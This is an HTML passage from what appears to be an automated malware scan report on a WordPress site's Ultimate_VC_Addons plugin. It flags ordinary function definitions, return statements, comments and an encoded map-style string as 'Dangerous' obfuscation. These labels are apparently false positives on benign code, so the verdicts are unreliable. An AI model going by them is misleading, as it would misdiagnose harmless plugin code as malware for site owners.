</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 719</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_register_style</span><span style="color: #007700">( </span><span style="color: #0000BB">$handle</span><span style="color: #007700">, </span><span style="color: #0000BB">$slug</span><span style="color: #007700">, </span><span style="color: #0000BB">$full_path </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$deps </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$ver </span><span style="color: #007700">= </span><span style="color: #0000BB">ULTIMATE_VERSION </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 741</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_js_path_data</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$js_path_data</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 774</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #0000BB">$handle</span><span style="color: #007700">, </span><span style="color: #0000BB">$slug</span><span style="color: #007700">, </span><span style="color: #0000BB">$full_path </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$deps </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$ver </span><span style="color: #007700">= </span><span style="color: #0000BB">ULTIMATE_VERSION</span><span style="color: #007700">, </span><span style="color: #0000BB">$footer </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">aio_front_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 856</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_is_editor' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_421").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/classes/ultimate_helper.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.70 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:23</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 26</span><br><table id="file_422" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$final</span><span style="color: #007700">; } </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate_getboxshadow'</span><span style="color: #007700">, </span><span style="color: #DD0000">'uavc_get_box_shadow'</span><span style="color: #007700">, </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">3 </span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">wpb_resize</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 143</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns an </span><span style="color: #007700">array.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$request </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return ( isset( </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">[ </span><span style="color: #0000BB">$request </span><span style="color: #007700">] ) ) ? </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">[ </span><span style="color: #0000BB">$request </span><span style="color: #007700">] : </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 201</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$final</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 206</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'uavc_get_url' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_get_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$img </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 214</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$img</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'uavc_get_image_squere_size' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 227</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_get_image_squere_size</span><span style="color: #007700">( </span><span style="color: #0000BB">$img_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$img_size </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_update_option' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 247</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$img_size</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'uavc_get_box_shadow' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 259</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_get_box_shadow</span><span style="color: #007700">( </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$data </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_update_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$request</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">update_option</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_options'</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_options </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'uavc_hex2rgb' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_hex2rgb</span><span style="color: #007700">( </span><span style="color: #0000BB">$hex</span><span style="color: #007700">, </span><span style="color: #0000BB">$opacity </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$rgba</span><span style="color: #007700">; </span><span style="color: #FF8000">// returns an array with the rgb values.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_ultimate_vc_responsive_media_css</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$content</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 83</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'uavc_img_single_init' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_option' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_img_single_init</span><span style="color: #007700">( </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$data </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$size </span><span style="color: #007700">= </span><span style="color: #DD0000">'full' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_422").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Google_Maps.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.05 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_423" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'JTVCJTBBJTIwJTIwJTdCJTBBJTIwJTIwJTIwJTIwJTIyZmVhdHVyZVR5cGUlMjIlM0ElMjAlMjJsYW5kc2NhcGUubWFuX21hZGUlMjIlMkMlMEElMjAlMjAlMjAlMjAlMjJlbGVtZW50VHlwZSUyMiUzQSUyMCUyMmdlb21ldHJ5JTIyJTJDJTBBJTIwJTIwJTIwJTIwJTIyc3R5bGVycyUyMiUzQSUyMCU1QiUwQSUyMCUyMCUyMCUyMCUyMCUyMCU3QiUyMCUyMnZpc2liaWxpdHklMjIlM0ElMjAlMjJvbiUyMiUyMCU3RCUyQyUwQSUyMCUyMCUyMCUyMCUyMCUyMCU3QiUyMCUyMmNvbG9yJTIyJTNBJTIwJTIyJTIzOWI5NTk1JTIyJTIwJTdEJTBBJTIwJTIwJTIwJTIwJTVEJTBBJTIwJTIwJTdEJTJDJTdCJTBBJTIwJTIwJTIwJTIwJTIyZmVhdHVyZVR5cGUlMjIlM0E...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_423").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_videos.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 46.33 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 28</span><br><table id="file_424" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_VC_Addons_Videos</span><span style="color: #007700">(); if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ultimate_Video' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Ultimate_Video </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 103</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_video_thumb</span><span style="color: #007700">( </span><span style="color: #0000BB">$setting </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate Heading Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1133</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_videos_module_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$img_info</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Video Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1218</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 123</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$thumb</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_embed_params</span><span style="color: #007700">( </span><span style="color: #0000BB">$setting </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Heading module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 193</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$params</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 197</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns Vimeo Headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 201</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_header_wrap</span><span style="color: #007700">( </span><span style="color: #0000BB">$setting </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
